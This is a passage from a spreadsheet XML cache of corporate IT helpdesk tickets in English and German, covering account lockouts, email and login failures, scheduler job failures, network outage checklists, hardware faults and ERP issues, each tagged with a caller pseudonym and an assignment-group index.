    <x v="11"/>
  </r>
  <r>
    <s v="fehler wie gehabt  - inplant_852536"/>
    <s v="datenbanken lassen sich noch nicht Ã¶ffnen_x000d__x000a_habe pc zuvor neugestartet"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="zugriff auf betriebsmittedatenbank ce_cs funktioniert nicht!!!"/>
    <s v="zugriff auf betriebsmittedatenbank ce_cs funktioniert nicht!!!"/>
    <s v="tiefszyh sfujdlgv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="for error message &quot;inwarehouse_tool document still contails message&quot;"/>
    <s v="can't posting in t-code miro.  error message is &quot;inwarehouse_tool document still contains message&quot; about po 5616637384,4505601201"/>
    <s v="cthaborg cahbxlmr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 04:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 04:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="def. montitor wechseln"/>
    <s v="bitte den def. monitor von der lÃ¼ftungssteuerung im heizraum tauschen. _x000d__x000a_kontakt : rÃ¶ssler christgrytian -189"/>
    <s v="ndkrcxjb hpormqtx"/>
    <x v="41"/>
  </r>
  <r>
    <s v="access requited for vl02n for post goods issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wrelsfqa.qfwosjkh@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_please can you usa access to myself and gydtvnlw miepcwzf to enable us to do the post goods issues for return deliveries. nieghjyukea for angelique and coetzk for myself._x000d__x000a__x000d__x000a_kind "/>
    <s v="wrelsfqa qfwosjkh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook hangs / does not open"/>
    <s v="outlook hangs / does not open"/>
    <s v="mvhcoqed konjdmwq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage  vogelfontein :company-eu-zaf-vogelfontein-dmvpn-1941  down since 8/23/2016 2:56 am est (site up on primary)"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______8/23/2016 2:56 am est_______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  ___yes______     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint____no____ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____yes___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___email______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___yes________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___na________    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _____yes__     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________na_________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?____na____    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_512 failed in job_scheduler at: 08/23/2016 03:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_512 failed in job_scheduler at: 08/23/2016 03:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_495 failed in job_scheduler at: 08/23/2016 03:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_495 failed in job_scheduler at: 08/23/2016 03:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="r216 maus defekt"/>
    <s v="r216 maus defekt"/>
    <s v="mhvbnqri sacvgzxf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="pc an reinecker wzs60 wahrscheinlich defekt. maschine steht."/>
    <s v="pc an reinecker wzs60 wahrscheinlich defekt. maschine steht."/>
    <s v="jcgzqndm hukibzqa"/>
    <x v="32"/>
  </r>
  <r>
    <s v="erp SID_34 account locked."/>
    <s v="erp SID_34 account locked."/>
    <s v="emjalxih bcetgmhr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is prompting for password "/>
    <s v="outlook is prompting for password "/>
    <s v="urxvagbn sibmvrqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker geht nach tonerwechsel nicht mehr"/>
    <s v="drucker geht nach tonerwechsel nicht mehr"/>
    <s v="ijsptgkh giojsnqz"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job Job_2662 failed in job_scheduler at: 08/23/2016 02:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2662 failed in job_scheduler at: 08/23/2016 02:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="17"/>
  </r>
  <r>
    <s v="lÃ¼fter defekt \rechner fÃ¼r videoÃ¼berwachung"/>
    <s v="lÃ¼fter defekt \rechner fÃ¼r videoÃ¼berwachung"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="usb keybankr/monitor"/>
    <s v="requested for usb keybankrd and external monitor for new desk space."/>
    <s v="vwaliogd dviwuzhm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="user cwfzldts dlmukhyn cannot create purchasing requistions out of punch out catalogues"/>
    <s v="he get the error &quot;documenttype no available for backend system&quot; see attached error messages in purchasing_x000d__x000a_for other users it works. seems to be something in his usersettings."/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="setup rechner ewew8323869 \wrcktgbd wzrgyunp"/>
    <s v="setup rechner ewew8323869 \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ich benÃ¶tige netzwerkkabel fÃ¼r den teleservice bei roboworker."/>
    <s v="hallo herr bghakch,_x000d__x000a_ich benÃ¶tige netzwerkkabel fÃ¼r den teleservice bei roboworker._x000d__x000a_benÃ¶tigt werden 3x 10m und 3x 5m die dauerhaft angeschlossen bleiben._x000d__x000a__x000d__x000a_"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit lan Ã­n beschprechungsraum \puxsvfwr cwkjruni"/>
    <s v="probleme mit lan Ã­n beschprechungsraum \puxsvfwr cwkjruni"/>
    <s v="puxsvfwr cwkjruni"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account names not seems on crm"/>
    <s v="i have issue when i try to create oppurtunities on crm. i didn't see any account name. normally it's working on connect and engineering_tool. please help to solve this issue. "/>
    <s v="fhcmnxat geazkjcs"/>
    <x v="39"/>
  </r>
  <r>
    <s v="conversion issue with the drawing nxd/71880207/000/00"/>
    <s v="1.)     only pdf got converted and accessible, model and dxf are not accesible_x000d__x000a__x000d__x000a_"/>
    <s v="ahmfwdxp frkmcqhg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attendance_tool issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ufgkybsh.ijswtdve@gmail.com_x000d__x000a__x000d__x000a_dear sir/mam,_x000d__x000a__x000d__x000a_i am facing issue with attendance_tool . the following message is showing and it is not showing in single sign in portal also._x000d__x000a__x000d__x000a_kindly help me to resolve the issue._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1fd31.c82afba0][cid:image002.jpg@01d1fd31.c82afba0]_x000d__x000a__x000d__x000a_"/>
    <s v="ufgkybsh ijswtdve"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="ofwxjriq rwcxkflq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="after changing my login id password in password_management_tool password manger, which was successful. i restarted my system, outlook/sky"/>
    <s v="name:wnorzsyv mdflqwxg_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wnorzsyv.mdflqwxg@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:after changing my login id password in password_management_tool password manger, which was successful. i restarted my system, outlook/skype is popping up with password request but not logging in"/>
    <s v="wnorzsyv mdflqwxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send or receive email "/>
    <s v="unable to send or receive email "/>
    <s v="iowkrcpd snrvlhyc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="vmbltjsf gwryhfbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login into attendance_tool"/>
    <s v="i am unable to login to attendance_tool using single logon portal link."/>
    <s v="iqpuxcbj nbaztpms"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_tooldplcmmaninp failed in job_scheduler at: 08/23/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_tooldplcmmaninp failed in job_scheduler at: 08/23/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="khgfbrdo vjxopikc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to engineering tool"/>
    <s v="unable to login to engineering tool"/>
    <s v="pkzthgea kgvsdmpj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook "/>
    <s v="unable to open outlook "/>
    <s v="tqemuawj mvcqrbaz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="jtaronux xvurkcbi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="awyw7217971"/>
    <s v="_x000a__x000a_received from: utgszjrf.pacfvxzk@gmail.com_x000a__x000a_please attend the below mentioned problem at the earliest._x000a__x000a_system name : awyw8328082_x000a_user name : talagrtymr_x000a_problem: display not coming on monitor, system is getting on and off continiously_x000a__x000a_best "/>
    <s v="utgszjrf pacfvxzk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="microsoft office software have problem, couldn't access link and pop up warning of &quot;computer limitation&quot;"/>
    <s v="contact phone: +86_x000a_system: windows 7_x000a_error messages: please refer to attachment"/>
    <s v="htzauevc nhxlvkta"/>
    <x v="0"/>
  </r>
  <r>
    <s v="shipping notification "/>
    <s v="_x000d__x000a__x000d__x000a_received from: bfckamsg.tzdkbmfe@gmail.com_x000d__x000a__x000d__x000a_hi it help_x000d__x000a_would you please help set the email of shipping notification for customer 81032999. "/>
    <s v="bfckamsg tzdkbmfe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="network outage ::  company-eu-che-company-switzerland-2-dmvpn-1811-rtr01(no backup) :: since # 8/22/2016 9:35 pm est"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __na_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________8/22/2016 9:35 pm est______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _____no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_yes____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______no____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ___________swisscom______________       _x000d__x000a__x000d__x000a_12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?_____naa___    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="ksem / wzs60 / m1 (m07.15360)"/>
    <s v="pc defekt, ist selbststÃ¤ndig runter gefahren und lÃ¤sst sich nicht mehr starten._x000d__x000a_bitte um erledigung durch m. himghtmelreich"/>
    <s v="zxopwyak zrbfkimx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="advanced search does not use the material field on the form"/>
    <s v="the same set of results is returned regardless if leaving the field blank or selecting any material."/>
    <s v="esntuago kwxrdhuv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="not able to open jpg image files."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ulroqsyf.wctpnarb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to open jpg image files on my pc._x000d__x000a_pl. help._x000d__x000a__x000d__x000a_"/>
    <s v="ulroqsyf wctpnarb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lorw8327797sf(usa robot):outlook did not complete on time had to be kirtyled alert in reporting_tool since 08/22 12:59 pm et"/>
    <s v="lorw8327797sf(usa robot):outlook did not complete on time had to be kirtyled alert in reporting_tool since 08/22 12:59 pm et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1953d failed in job_scheduler at: 08/22/2016 18:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953d failed in job_scheduler at: 08/22/2016 18:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1953d :was running longer than 30 minutes"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953d failed in job_scheduler at: 08/22/2016 18:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="usa has 2 unresolved mii password lockouts-employees got  &quot;user authentication failed&quot; error-cannot confirm production"/>
    <s v="hi all, _x000a_ _x000a_we had 3-4 occurences where people got a &quot;user authentication failed&quot; error: _x000a_ _x000a_1)      tortm hortl (howthrelte)_x000a_2)      yqxlbswt eimhxowu (tnhymatj) - unresolved_x000a_3)      ligsnzur smcxerwk (grargtfl) - unresolved_x000a__x000a_could you please check the root cause and unlock the operators' passwords so they can log into mii and report production _x000a_ _x000a_for lee, we were able to get through to password_management_tool and unlock the password â€“ he will try in 20 mins to see if it works_x000a_ _x000a_for the others, i got a &quot;failed to verify password on active directory&quot; error when we tried to get into password_management_tool_x000a_it helped unlock tony's password but we got the same error after 30 minutes _x000a_ _x000a__x000a_ _x000a_i was only able to resolve tortm hortl's password issue before the end of the shift. _x000a__x000a_"/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_tooldplcmmaninp failed in job_scheduler at: 08/22/2016 17:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_tooldplcmmaninp failed in job_scheduler at: 08/22/2016 17:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="dell 7350: blue screen error.urgent "/>
    <s v="dell 7350: blue screen error_x000a_-user has tried to recover and safe mode and restart , all the 3 opetions done help._x000a_-service tag: 80sjv32_x000a_-asset tag: 405429_x000a_-os: win 8.1_x000a_-c: "/>
    <s v="qjiutmel fgvtxeoy"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="dalhjmcn fisvztuy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distributor_tool page error"/>
    <s v="distributor_tool page error"/>
    <s v="iefgkray zdyksvpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="did we send out automatic erp gui upgrade"/>
    <s v="name:stefdgthyo_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ejpvuxrg.tryaibcx@gmail.com_x000a_customer number:_x000a_telephone:+1 _x000a_summary:did we send out automatic erp gui upgrade?"/>
    <s v="ejpvuxrg tryaibcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage :india, india - (company) hard down since 1:17 pm on 08/22 et"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____1:17 pm on 08/22 et__________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __na_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____na___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_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na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="vpn connection issues."/>
    <s v="vpn connection issues._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-changed the default browser ._x000d__x000a_-advised the caller to logon to the company vpn._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved._x000d__x000a_"/>
    <s v="gbwviklo ukwijqtm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail2 failed in job_scheduler at: 08/22/2016 15:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail2 failed in job_scheduler at: 08/22/2016 15:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="mobile device activation for the new iphone"/>
    <s v="mobile device activation for the new iphone"/>
    <s v="hvjmxkcp pvzlgeyw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="decimal values in &quot;daily qty confirmed&quot;"/>
    <s v="usa plant, work center preeco showing 4840.1 in mentioned field_x000d__x000a__x000d__x000a_for reference:_x000d__x000a__x000d__x000a_collaboration_platform:#decimal%20values%20in%20%22daily%20qty%20confirmed%22&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={f3cce32e-bc9f-426d-a364-92434990ca0f}&amp;end"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="otd to frozen date alert issue"/>
    <s v="in supervisor dashbankrd the &quot;otd to frozen date&quot; alert is not populating correctly_x000d__x000a__x000d__x000a_for reference:_x000d__x000a__x000d__x000a_collaboration_platform:#re%20otd%20to%20frozen%20date%20alert&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={aa19plant_19-415f-43de-90ac-dac4af090b67}&amp;end"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="setup time not calculated properly"/>
    <s v="email from kanchi (usa) on how confirmation times are calculated in mii. _x000d__x000a__x000d__x000a_in one example kahrthyeui found out that mii was using work center or factory calendar (excluding weekend time from calculation) but in other cases it was not. _x000d__x000a__x000d__x000a_more details on page _x000d__x000a__x000d__x000a__x000d__x000a_collaboration_platform:#re%20time%20calculations%20in%20erp%20/%20mii&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={e2181c91-05d2-418e-999a-1475f818a343}&amp;end"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="global erp crm:  please investigate why agbighyail espinosa's employee account in erp crm is not recognized as an employee"/>
    <s v="global erp crm:  please investigate why agbighyail espinosa's employee account in erp crm is not recognized as an employee.  please refer to the screenshots in the attached email.  wdkaoneh unqlarpk is an employee, but her employee account in erp crm is not displayed if you search using &quot;role is employee&quot;.  you can only find her employee account in erp crm if you don't specify &quot;role is employee&quot;."/>
    <s v="aoyrspjv hctgfeal"/>
    <x v="14"/>
  </r>
  <r>
    <s v="can't search work center # in machine # field in collective confirmation (header level)"/>
    <s v="erp-mii_x000d__x000a__x000d__x000a_we can search machine numbers by typing work center numbers in the pop up box of machine field. this works in time event and normal confirmation but does not work in collective header level"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="job HostName_1019fail1 failed in job_scheduler at: 08/22/2016 15:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail1 failed in job_scheduler at: 08/22/2016 15:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cannot change in conditions tab"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_it appears i don't have access to change any values in the conditions tab.  please review for the issue, as i need to complete this quote and convert to usd/kg instead of rub/kg._x000d__x000a__x000d__x000a_[cid:image001.png@01d1fc7d.3c4918b0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="reset passwords for pzjelyxg vstyaouc using password_management_tool password reset."/>
    <s v="the"/>
    <s v="pzjelyxg vstyaouc"/>
    <x v="16"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0432805"/>
    <s v="ticket update on ticket_no0432805"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="quadra chek pc in the eaymvrzj bumzwtco will not start, power is connected but nthing when button is pressed."/>
    <s v="quadra chek pc in the eaymvrzj bumzwtco will not start, power is connected but nthing when button is pressed."/>
    <s v="nwgcbfdt ahmbnsoi"/>
    <x v="2"/>
  </r>
  <r>
    <s v="collaboration_platform site  ownership"/>
    <s v="_x000d__x000a__x000d__x000a_received from: unrbafjx.reyshakw@gmail.com_x000d__x000a__x000d__x000a_hello it help,_x000d__x000a__x000d__x000a_since the owner has left the company, please reallocate the ownership of this subsite to my name. "/>
    <s v="unrbafjx reyshakw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="vip 2 // unable to open any files from collaboration_platform"/>
    <s v="stdezpqw bkmeuhfz has never been able to open any kind of files from collaboration_platform. it keeps on asking her for email address and password and even after entering it keeps coming back."/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot access to company collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zywoxerf.paqxtrfk@gmail.com_x000d__x000a__x000d__x000a_dear it:_x000d__x000a_i either cannot access to company collaboration_platform or after the &quot;company collaboration_platform&quot; page stuck at a blank page of &quot;outlook.office365.com&quot; as shown below._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1fc73.23ca3cb0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp order acknowledgement weight difference"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please review the quantity on the attached  order acknowledgement._x000d__x000a_in the quantity column the weight of 4.536 kg is correct._x000d__x000a_in the description field the qty is 3.000 kg.  this is incorrect._x000d__x000a_correct the quantity value to be 4.536 kg in both areas._x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to load collaboration_platform"/>
    <s v="unable to load collaboration_platform"/>
    <s v="shpnkgir mpsycbxl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="india company: tcl circuit intermittently flapping since at 12:50 pm est on 08/22. site is active on primary."/>
    <s v="intermittent flap in tcl link.. tcl#3740oc220816."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="having to approve the same credit memo several times."/>
    <s v="please review the approver level for stefyty ross (director of sales).  at times, i am having to approve the same credit memo 2 to 3 times in workflow.  this should not be happening. "/>
    <s v="sghamujc shompueb"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to login to the replacement laptop as its showing no connection to server. "/>
    <s v="unable to login to the replacement laptop as its showing no connection to server. "/>
    <s v="eocvkuxw eqfsphnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1374 failed in job_scheduler at: 08/22/2016 13:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1374 failed in job_scheduler at: 08/22/2016 13:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="account locked "/>
    <s v="account locked "/>
    <s v="cvjdqazg ejdnpytr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype connectivity is flickering: automatically signout and signing in back. no sfb online outage from server end."/>
    <s v="network team,_x000d__x000a__x000d__x000a_kindly look into the below issue:_x000d__x000a__x000d__x000a_skype connectivity is flickering: automatically sign-out and signing in back. no sfb online outage from office 365 server end._x000d__x000a__x000d__x000a_issue is with multiple user. kindly keep the ticket priority as sev 3 till the issue is resolved._x000d__x000a_"/>
    <s v="qasouhlc xkhsirtd"/>
    <x v="3"/>
  </r>
  <r>
    <s v="unable access - net weaver"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rhwvpmlq.zuwhpqrc@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_i am unable to access the below . kindly do the needful._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1fcc3.37c4c640]_x000d__x000a__x000d__x000a_"/>
    <s v="rhwvpmlq zuwhpqrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="team sproc is not assigning indirect revenue"/>
    <s v="the tam sproc is incorrectly inner joining previous ytd revenue when it should be left joining so that it wont result in an empty result set if there is no previous revenue (aka the first period of a financial_toolcal year)"/>
    <s v="fqxnplkb cqhnavfp"/>
    <x v="25"/>
  </r>
  <r>
    <s v="pikosa cannot log into work station"/>
    <s v="hello,_x000d__x000a_xepcsrvh tbsokfyl for several days cannot log into her workstation, because telephony_software says it is used, but does not specify by whom (screenshot in the attachment). the station she wants to log into is hers and she had always used. please advise."/>
    <s v="ahydmrbu fjymgtvo"/>
    <x v="6"/>
  </r>
  <r>
    <s v="download drawing response is error even though a succesful email is received"/>
    <s v="when i send the input to download a drawing, i always get a reply &quot;email not sent&quot; but i still get the email. for example, below input _x000d__x000a__x000d__x000a_        {_x000d__x000a_           &quot;i_mail_inputs&quot;:_x000d__x000a_           {_x000d__x000a_             &quot;sales_doc&quot;:&quot;&quot;,_x000d__x000a_             &quot;delivery_doc&quot;:&quot;&quot;,_x000d__x000a_             &quot;billing_doc&quot;:&quot;&quot;,_x000d__x000a_             &quot;purchasing_doc&quot;:&quot;&quot;,_x000d__x000a_             &quot;pur_sch_agr&quot;:&quot;&quot;,_x000d__x000a_             &quot;mat_drawing&quot;:&quot;x&quot;,_x000d__x000a_             &quot;doc_num&quot;:&quot;3115968804&quot;,_x000d__x000a_             &quot;language&quot;:&quot;e&quot;,_x000d__x000a_             &quot;mail_id&quot;:&quot;tskwevno.sjhpoakl@gmail.com&quot;,_x000d__x000a_             &quot;download_flag&quot;:&quot;&quot;_x000d__x000a_          }_x000d__x000a_        }_x000d__x000a__x000d__x000a_the document number has a special material in it which has a pdf drawing. when i send the above input, i expect it sends email and it definitely sends the email fine. however, the reply i get from erp always is &quot;email not sent&quot; which does not make sense as i do get the email._x000d__x000a_important â€“ the downloading of file to ftp site works fine. it is just not returning a valid message even when it successfully send the email._x000d__x000a_"/>
    <s v="tskwevno sjhpoakl"/>
    <x v="20"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="afslkeui qgzfptjw"/>
    <x v="0"/>
  </r>
  <r>
